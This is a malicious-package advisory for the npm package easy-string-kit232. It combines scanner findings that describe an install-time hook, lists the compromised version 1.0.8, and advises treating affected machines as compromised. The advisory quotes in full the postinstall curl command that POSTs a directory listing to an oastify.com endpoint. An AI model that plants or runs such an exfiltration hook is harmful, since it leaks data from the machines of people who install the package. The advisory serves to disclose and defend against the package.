VYPR

npm · Malicious package advisory

Malware

easy-string-kit232

MAL-2026-6461

Malicious code in easy-string-kit232 (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (9c3f74b6873c47dc8f3a6d6922e9d66d17cafe47b7a80447f45bfe0d1535a6b5)
package.json declares a postinstall lifecycle script that auto-executes on `npm install` and runs `curl -X POST -d "$(ls -la /data/logs/)" http://3dhd6wwmusbh04m22igmzvb4hvnmblza.oastify.com/data`. This shells out at install time, captures a directory listing of `/data/logs/` on the installer's host, and POSTs the output over plaintext HTTP to a Burp Suite Collaborator (oastify.com) out-of-band subdomain controlled by whoever generated that Collaborator instance. The package advertises itself as a string-utility kit, which has no need to enumerate host filesystem contents or contact a remote OAST endpoint. Author, repository, bugs, and homepage metadata are all empty, consistent with a throwaway publish purpose-built for the exfil payload rather than a maintained utility.

## Source: ossf-package-analysis (a16e7a0f092a57588a7267c8acbe881b0f465581afb34aedb671eecd1de3ad9f)
The OpenSSF Package Analysis project identified 'easy-string-kit232' @ 1.0.8 (npm) as malicious.

It is considered malicious because:

- The package communicates with a domain associated with malicious activity.

- The package executes one or more commands associated with malicious behavior.

Compromised versions (1)

  • 1.0.8

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.